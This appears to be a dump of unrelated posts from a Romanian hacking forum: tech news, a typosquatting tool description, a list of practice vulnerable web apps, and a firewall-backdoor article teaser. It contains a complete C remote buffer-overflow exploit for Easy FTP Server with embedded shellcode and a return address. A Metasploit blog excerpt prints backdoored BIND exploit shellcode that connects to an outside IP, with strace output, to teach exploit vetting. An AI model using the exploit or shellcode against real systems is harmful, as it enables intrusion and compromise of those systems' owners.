begood

sexy ^^ multam.

instalezi asta : UNetbootin - Homepage and Downloads bagi usb formatat in comp, alegi imaginea iso, o arzi pe usb cu acel program. reboot, selectezi sa bootezi de pe usb device (F8 in timp ce se deschide compul) de acolo ar trebui sa mearga totul.

aici nu postezi chestii de genu.

intr-o vreme faceam livecd-uri cu bartpe si cream multiboot liveusb just for the fun ^^

GeeXboX is a free embedded Linux distribution which aims at turning your computer into a so called HTPC (Home Theater PC) or Media Center. Being a standalone LiveCD-based distribution, it's a ready to boot operating system than works on any Pentium-class x86 computer or PowerPC Macintosh, implying no software requirement. You can even use it on a diskless computer, the whole system being loaded in RAM. Despite his tiny ISO image size, the distribution comes with a complete and automatic hardware detection, not requiring any driver to be added. It supports playback of nearly any kind of audio/video and image files and all known codecs and containers are shipped in, allowing playing them through various physical supports, either being CD, DVD, HDD, LAN or Internet. GeeXboX also comes with a complete toolchain that allows developers adding easily extra packages and features but that might also be used to give birth to many dedicated embedded Linux systems. GeeXboX HomePage

kw3 nu tine la bautura ... 2-3 luni

We visit dozens of websites everyday, sometimes we are in a hurry to get to the website and try to quickly type in the URL in the browser address bar. At times, we make typographical mistakes such as character omission / replacement / insertion, adjacent character swap, singular / plural mistakes etc. Most of the times this is easy to detect and we get a "website not found" error and we recognize our mistake. But what if there was a website which corresponded to the typo? What if someone setups up an identical website there and you mistakenly type in your credentials? Welcome to the world of Typo-squatting or URL Hijacking as it is called. In this video we look at a tool called Urlcrazy using which we shall explore a sample case of Typo-squatting using Paypal. It is important to note that sometimes a typo error could actually correspond to a legitimate website, but, it is also important to be aware that it could be used for malicious purposes as well. Urlcrazy can be used by Website admins to check the possible typos a person could most probably make while trying to get to their website. If there are sites corresonding to the typo, it would be a good idea to check them regularly to make sure that they are not being used for malicious purposes. video : Typosquatting and URL Hijacking using Urlcrazy Tutorial tool : http://rstcenter.com/forum/21687-urlcrazy-study-domainname-typos-url-hijacking.rst

It generates domainname typo permutations then tests them to learn if they are in use, estimates their popularity and more. TYPES OF TYPOS SUPPORTED Character Omission. These typos are created by leaving out a letter of the domain name, one letter at a time. For example, www.goole.com and www.gogle.com Adjacent Character Swap. These typos are created by swapping the order of adjacent letters in the domain name. For example, www.googel.com and www.ogogle.com Adjacent Character Replacement. These typos are created by replacing each letter of the domain name with letters to the immediate left and right on the keyboard. For example, www.googke.com and www.goohle.com Adjacent Character Insertion. These typos are created by inserting letters to the immediate left and right on the keyboard of each letter. For example, www.googhle.com and www.goopgle.com Missing Dot. These typos are created by omitting a dot from the domainname. For example, wwwgoogle.com and www.googlecom Strip Dashes. These typos are created by omitting a dash from the domainname. For example, www.domain-name.com becomes www.domainname.com Singular or Pluralise. These typos are created by making a singular domain plural and vice versa. For example, www.google.com becomes www.googles.com and www.trademe.co.nz becomes www.trademes.co.nz DOMAIN TESTS Is the domain valid? UrlCrazy has a database of valid top level and second level domains. This information has been compiled from wikipedia and domain registrars. We know whether a domain is valid by checking if it matches toplevel and second level domains. For example, www.trademe.co.bz is a valid domain in Belize which allows any second level domain registrations but www.trademe.xo.nz isn't because xo.nz isn't an allowed second level domain in New Zealand. Popularity Estimate We can estimate the relative popularity of a typo by measuring how often that typo has been made on webpages. Querying cuil.com for the number of search results for a typo gives us a indication of how popular a typo is. The drawback of this approach is that you need to manually identify and omit legitimate domains such as googles.com For example, consider the following typos for google.com. Quantity Typo 25424 gogle.com 24031 googel.com 22490 gooogle.com 19172 googles.com 19148 goole.com 18855 googl.com 17842 ggoogle.com 16490 googe.com 16367 googgle.com 15029 google.cm 14773 gogole.com 13227 googlle.com 11646 googlee.com 11345 googlr.com 7417 foogle.com 6132 hoogle.com 5313 googlw.com 5208 giogle.com 5151 googke.com 4838 goigle.com 4662 ogogle.com 4630 gopgle.com 4415 goofle.com 4118 wwwgoogle.com 3894 goohle.com 3399 gooigle.com 2675 gfoogle.com 1942 googlecom.com 1534 gopogle.com 1356 googfle.com 1089 googhle.com 892 googlew.com 747 googlke.com 618 goiogle.com 614 goopgle.com 413 ghoogle.com 341 goolge.com 232 googler.com 228 gpogle.com http://code.google.com/p/urlcrazy/

A new site dedicated to "building, managing, and researching professional reputations" that lets those in the work world comment on their bosses, colleagues and associates is creating controversy even before it's officially launched. Unvarnished.com, still in a test phase, hides the name of those commenting on a person, but the reviewer's identity is known to those who run the site, said Peter Kazanjy, one of the site's co-founders. He said only civil comments will be allowed, and that Unvarnished.com will offer a more realistic assessment of a person's strengths and weaknesses than a professional networking site such as LinkedIn. Unvarnished - Community-contributed reviews for business professionals source msnbc.msn.com

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> //************************************************************************* // Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // ( 11470_x90c.c ) // // Date: 24/03/2010 // Author: x90c < x90c.org > // // Discovered by: loneferret // // Exploits by: // [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 ) // - http://www.exploit-db.com/exploits/11470 // [2] 11470_x90c.c ( Exploit ) // ( MAGIC RET, Metasploit shellcode ) //************************************************************************* // Metasploit shellcode ( calc.exe ) - 228 Bytes static char shellcode[] = { "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" "\x1b\x35\x1d" }; int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in sa; char rbuf[128]; char x0x[278]; int i = 0, j = 0; int port = 0; int err = 0; printf("\n\n***********************************************\n"); printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF *\n"); printf("* Found by: loneferret *\n"); printf("* - http://www.exploit-db.com/exploits/11470 *\n"); printf("* - 11470_x90c.c - x90c *\n"); printf("***************************************************\n\n"); if( argc < 3 ) { printf("Usage: %s <Target IP> <Port>\n\n", argv[0]); exit(1); } port = atoi(argv[2]); if(port <= 0 || port > 65535) { port = 21; } printf("[PORT] %d/tcp\n", port); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(argv[1]); sa.sin_port = htons(port); if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { err = -1; fprintf(stderr, "[!] Socket failed\n"); goto out; } // Socket Connect if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1) { err = -2; fprintf(stderr, "[!] Connection failed!\n"); goto out; } printf("[+] Connected!\n"); // Auth recv(sockfd, rbuf, sizeof(rbuf), 0); send(sockfd, "USER anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "okay") != NULL) printf("[USER] anonymous\n"); send(sockfd, "PASS anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "logged in.") != NULL) printf("[PASS] anonymous\n"); // Fill Payload memset(&x0x, 0x90, sizeof(x0x)); for(i = 20, j = 0; j < strlen(shellcode); j++) x0x[i++] = shellcode[j]; x0x[0] = 'M'; x0x[1] = 'K'; x0x[2] = 'D'; x0x[3] = ' '; // MAGIC RET: // # CALL EBP ( EBP Register points to nopsled of this payload when overflowed ) // # 004041EC FFD5 |CALL EBP // # // x0x[272] = '\xEC'; x0x[273] = '\x41'; x0x[274] = '\x40'; x0x[275] = '\x00'; x0x[276] = '\r'; x0x[277] = '\n'; x0x[278] = '\x00'; printf("[+] Sending payload...\n"); // Send payload send(sockfd, x0x, 278, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL)) { printf("[!] anonymous account doesn't have permission to MKD command...\n"); printf("[!] Exploit Failed. ;-x\n"); goto out; } printf("[+] Exploited \n"); out: close(sockfd); return err; }

BadFoo md5 : 1b1f37ed6b6f958cde0529a8a1f06637

This afternoon a question came up on the #metasploit IRC channel (irc.freenode.net). The questioner asked: "Should a good penetration tester know assembly?". This lead to some discussion about when and where assembly language skills become important in the scope of a penetration test. My normal response to "Should I learn [something]?" questions is always a resounding YES; it is hard to know too much as a penetration tester or system auditor. Little things, like knowledge of beginner mistakes in configuration files, can go a long way to a successful penetration test. In the case of assembly, it helps, just like everything else does, but its not always required or even used frequently. Assembly language programming is mandatory for developing your own exploits and for tweaking others, but for the most part, it is not the defining factor in whether you will gain access to a network. There is one critical task where deep knowledge of assembly (and C) is required; validating public exploits. Over the years, dozens of fake exploits have been released; some of these delete all of the files from the drive, while others install a persistent backdoor. There is one other class of backdoored exploits that you rarely hear about, but are still found on public exploit repositories. These exploits look correct, function correctly, but also provide the exploit author with access to the system you exploited. The tricky thing about these exploits is that to find the backdoor, you have to decode and understand the shellcode, which is invariably written in assembly language. Lets go through a real-life example. In 2001, Gustavo Scotti of Tamandua Laboratories (now Axur Information Security) released an exploit for the BIND TSIG buffer overflow vulnerability published by Network Associates (now McAfee). This exploit, named tsl_bind.c can still be found on a number of exploit repositories, including PacketStorm. This exploit looks and works as advertised, except for one tiny thing. Lets take a closer look at the Linux shellcode in this exploit: /* SHELLCODE - this is a connect back shellcode */ u8 shellcode[]= "\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46" "\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89" "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43" "\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90" "\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59" "\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46" "\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86" "\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06" "\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0" "\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62" "\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46" "\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3" "\xcd\x80\x31\xc0\x40\xcd\x80"; Nothing too sinister jumps out at first glance, but lets actually look at the instructions: 00000000 3C90 cmp al,0x90 00000002 89E6 mov esi,esp 00000004 83C640 add esi,byte +0x40 00000007 C70602000BAC mov dword [esi],0xac0b0002 0000000D C7460497C447A0 mov dword [esi+0x4],0xa047c497 00000014 31C0 xor eax,eax [snip] 00000058 7432 jz 0x8c 0000005A 8B0424 mov eax,[esp] 0000005D 894608 mov [esi+0x8],eax 00000060 90 nop 00000061 BD7F000001 mov ebp,0x100007f 00000066 896E04 mov [esi+0x4],ebp 00000069 C70603803586 mov dword [esi],0x86358003 0000006F B804000000 mov eax,0x4 In the code above (see here for a full listing), we can see that there are actually TWO reverse connections. One which goes to 151.196.71.160 (0x97c447a0) and another that goes to 127.0.0.1 (0x7f000001). The 127.0.0.1 address is substituted when the exploit is run, but the first address is not. In essence, every time this exploit succeeds, it will provide you with a shell, but also connects back to the author's IP address and send a blob of information about the user running the exploit. If you pipe the shellcode into Metasploit's msfencode, you can see it in action: $ msfencode -e generic/none -a x86 -p linux -t elf -o tsl.bin < shellcode.raw $ chmod +x ./tsl.bin $ strace -f -qix ./tsl.bin [ Process PID=15282 runs in 32 bit mode. ] socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 connect(3, {sa_family=AF_INET, sin_port=htons(2988), sin_addr=inet_addr("151.196.71.160")}, 16 write(3, "\3\2005\206\177\0\0\1\1\0\0\0", 12) = 12 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4 connect(4, {sa_family=AF_INET, sin_port=htons(2987), sin_addr=inet_addr("127.0.0.1")}, 16) = 4 dup2(4, 0) = 0 dup2(4, 1) = 1 execve("/bin/sh",...)= 0 To add insult to injury, the backdoor IP gets the shellconnection first! In summary, if you are using exploits from public repositories for your penetration testing engagements, you do need to learn assembly code. Intel x86 is a must, but also any other architecture you happen to test (PowerPC, SPARC, ARM, etc). This is another reason to prefer the Metasploit Framework over an unveted public exploit. Every single exploit, encoder, nop generator, and payload in Metasploit has been reviewed by a member of the core team. A side effect of us converting public exploits into Metasploit modules is the review and analysis process. Public code is first broken down into the transport, vector, return address, and payload components, and each piece is then reimplemented using the Metasploit API. This process leads to reliable exploit code that doesn't depend on a specific payload or transport. Update: A few folks have asked about getting started guides for x86 assembly. The resource I find useful is the tutorial section of Linux Assembly project. Once you have the basics down, take a look through the shellcode directory of the Metasploit Framework and study up with the NASM Manual. Update: In addition to the comments below, the Programming From the Ground Up book was recommended, as well as the ASM Community web site. Update: Based on gscotti's comments below (the original author), I clarified the post to indicate that only a reverse connect is made, not an actual shell. His comment states that over 30,000 IPs connected back since he released it. hdmoore @ blog.metasploit.com

Want to know how "Clash of the Titans" will fare at the box office this weekend? Check Twitter. So say two Silicon Valley researchers who claim they have discovered a way to use the popular social media service to gauge real-time interest in movies and accurately predict how they will perform at the box office on opening weekend. Sitaram Asur and Bernardo Huberman, two social computing scientists at HP Labs in Palo Alto, Calif., contend that computational methods using Twitter feeds can predict with as much as 97.3 percent accuracy how a movie will perform its first weekend of release. That far surpasses the traditional survey-based "tracking" reports that studios have long relied upon to forecast movie ticket sales, or the popular online site Hollywood Stock Exchange that lets users wager box office predictions with pretend money. The computer models based on Twitter chatter could signal a Merlin-like tool for Hollywood, which has long struggled to come up with fail-safe ways to figure out how movies will do at the box office. Among other things, the research could help studios decide whether to make last-minute tweaks to advertising campaigns, or scale back and cut their losses. Although the studios can often predict some weekend box-office results within 10 percent, their results can fall short on films that target kids or teen fan boys, or are outliers like the recent Oscar winner, "The Blind Side." The researchers used the rate at which movies are mentioned in Twitter updates to predict first-weekend box-office returns. The sentiment of the tweets -- positive, neutral or negative -- also accurately predicted second weekend, they said. The research comes as movies' performance in the nearly $11 billion box-office market, once of concern only to Hollywood insiders, has become a national pastime. It also comes as two trading firms, a Wall Street player and a Midwest upstart, are trying to roll out futures exchanges that they say are designed to help studios hedge box-office performance. Huberman said the research shows that Twitter could be tapped to predict the outcome of all sorts of things, including how well major new products will be received and the outcome of major political races. That could capture the elusive commercial potential of social media, that services like Twitter with their vast flow of real-time information have the power and reach to track people's interests. Twitter, which has yet to demonstrate how it will translate its huge popularity into profits, will unveil a new advertising platform this month. Hollywood has aggressively tapped social media as it becomes more important in influencing movie-going decisions. "There's a lot of science that goes into this stuff even in red-neck Hollywood," said veteran Hollywood marketer Gordon Paddison. Paddison released a report last fall that studied how 4,000 moviegoers use online resources to make their ticket-buying decisions. He found that while critics have little sway, social-media recommendations do. Twitter and other social media services are more valuable to Hollywood in influencing sentiment than in predicting it, Paddison said. Twitter's influence is also limited because its audience trends younger and hipper, without tapping other groups that drive a film's popularity. "Are there enough hardcore Christians on Twitter to predict that the 'Passion of the Christ' will be a $400 million film?" Paddison asked. "If so, then studios would be highly interested." Hollywood studios spend millions annually on marketing research, including test screenings (where invited audiences, shown films often months before their premieres, not only give the movies numerical scores but also say what scenes and characters they did and didn't like) and telephone and online surveys. The latter data, which is compiled and reported by several different firms, can give studios insight into what segments of an audience are interested in a given film, and a usually reliable estimate of how well the film may or may not in its premiere weekend. While these so-called tracking surveys are sometimes far off the mark, particularly for movies catering to children and teenage fan boys, they most often carry a margin of error of about 10 percent. Whether social media can deliver returns at the box office remains to be seen. "Twitter is a reflection of what people are talking about," said one studio marketing head, who was unacquainted with the HP Labs researchers' claims and requested anonymity. "Nobody has figured out how to harness it yet, and the tools that exist to monitor it so far seem wonky and unreliable." The HP Labs study analyzed nearly 3 million Twitter updates that mentioned 24 major releases -- "Alice in Wonderland," "Avatar" and "Twilight: New Moon" -- over the course of three months. By factoring in the date of a movie's release and the number of theaters where it appeared, the researchers predicted opening weekend box-office performance with 97.3 percent accuracy. They developed a system to evaluate the sentiment of Twitter updates -- positive, neutral or negative -- to predict the following weekend's returns with 94 percent accuracy. For example: The researchers' Twitter-based methodology predicted "Dear John" would garner $30.71 million at the box office on opening weekend. It pulled in $30.46 million. And for "The Crazies," the methodology predicted $16.8 million, and it earned $16.07 million on opening weekend. The researchers are applying for a patent for the methodology they used. They say don't have any plans yet to commercialize it, but are presenting their findings at Web intelligence conference in Toronto in August. physorg

Apple's iPad has already been jailbroken, using a variation of the iPhone method and demonstrating just how much the two devices have in common. The hack was completed in less than 24 hours. In theory it enables the owner to install everything from Wi-Fi scanners to pornography - applications Apple disapproves of - though for the moment it just allows a remote terminal connection. The hack potentially even allows Palm OS applications to run on the iPad, thanks to jailbreaking. But amidst all this excitement over the hack, it seems few iPad customers are rushing out to buy newspaper subscriptions. PaidContent reports that the newspaper and magazine subscriptions through which the iPad was supposed to change the world, are curiously absent from the lists of most popular paid applications. That could be bad news for the media, but we suspect it's attributable to the early adopters being used to getting stuff for free, so we'll withhold judgement until Cupertino ships a few more pads. Apple reckons it's already shipped 300,000 iPads, but that includes stocking shops and it would be interesting to know how many are still knocking around on the shelves. Gizmodo wandered around some local Apple stores and was surprised to find them well stocked for the revolution, so if you've not got your iPad yet (and happen to be in America) then you should be able to pick one up easily enough. But the kind of buyers interested in newspaper subscriptions won't be buying an iPad in the first week. They'll be waiting to see how it develops, unlike the early adopters rushing to jailbreak the device as a techie's toy. It will be a while before we can say if Apple really has created a new computing paradigm. theregister

Academic papers, reports, essays, books and articles regarding hackers, the process of hacking, and the social aspects of the entire archetype. I've tried to be all-inclusive, and make this collection more browsable with quick summaries of what each paper contains. Hacker: Academic and Popular Writings

bine ai venit.

barbatele nu merge nimic, poti sa tot incerci tu si pe dracu. poate primesti warn pentru ca ai incercat sa gasesti vulnerabilitate in forum.

sa le fie de bine.

Need to catch up on your reading? Like, a whole damn lot of reading? A new iPhone app offers 746 free public domain scifi books from authors such as Jules Verne, Edgar Rice Burroughs, and H.G. Wells. App designers Spreadsong have aggregated hundreds of classic and pulp works from the architects of modern science fiction, all for the price of a sunbeam. Spreadsong touts the app as a 100% free smorgasbord of classic literature. What a rad idea! I could this see this being very handy for research papers, authors searching for literary allusions, or League of Extraordinary Gentlemen completists who must absolutely track down every eensy-weensy reference*. *I'd be remiss if I didn't mention you can already read Jess Nevins' mind-bogglingly detailed League annotations online. via itunes //pe langa astea va mai recomand si http://www.feedbooks.com/

Just a quick post. Someone on the ‘NULL’ mailing asked for WebGoat alternatives to learning Web Application penetration testing. The reponse was amazing, with many applications being listed as vulnerable web applications designed for learning web-app pentest. I have collected all vulnerable web applications and listed them below for reference: 1. SPI Dynamics (live) – http://zero.webappsecurity.com/ 2. Cenzic (live) – http://crackme.cenzic.com/ 3. Watchfire (live) – http://demo.testfire.net/ 4. Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com 5. PCTechtips Challenge (live) - http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/ 6. Damn Vulnerable Web Application – http://dvwa.co.uk/ 7. Mutillidae – http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 8. The Butterfly Security Project – http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/ 9. Hacme Casino – http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm 10. Hacme Bank 2.0 – http://www.foundstone.com/us/resources/proddesc/hacmebank.htm 11. Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html 12. Hacme Books – http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm 13. Hacme Travel – http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm 14. Hacme Shipping - http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm 15. OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project 16. OWASP Vicnum – http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project 17. OWASP InsecureWebApp – http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project 18. OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator 19. Moth - http://www.bonsai-sec.com/en/research/moth.php 20. Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/ 21. SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/ 22. BadStore – http://www.badstore.net/ 23. WebMaven/Buggy Bank – http://www.mavensecurity.com/webmaven (very old) 24. Exploit-DB – http://www.exploit-db.com/webapps (some vulnerable web applications are provided as downloads) securitythoughts.wordpress.com

Google has purchased Episodic, a San Francisco-based startup offering a platform for delivering live and on-demand video via the web. Episodic trumpeted the deal on Friday with a post to its blog. The startup says that in joining Google, it will continue its work to deliver video to desktops and notebooks, mobiles, and IPTV devices and that there will be no interruption in service for existing Episodic customers. New account sign-ups, however, have been suspended. "From our earliest discussions with Google, it was clear that the teams shared this belief and together we obviously see huge potential in online video," the post reads. "Our product visions were also complementary and together we will continue to produce innovative video technology for our customers and their viewers." The company's platform lets businesses - including content creators, marketers, and enterprises - host, stream, measure, and, yes, monetize their videos. Monetization is done via advertising as well as online credit-card sales. The platform could dovetail with YouTube, but it's also worth noting that Episodic mentions IPTV devices. Multiple reports have indicated that Google is developing a television set-top box that - among other things - delivers web video. Terms of the deal were not disclosed. theregister.co.uk

în cur la mâ?.

meh, am trimis un tip la torrentfreak despre potentiala utilizare a "metodei" in bittorrent. sa vedem ce iese.

----[ Introduction This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system. Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and is not easily detectable. The kind of backdoor needed depends on the firewall architecture used. As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun. more : Placing Backdoors Through Firewalls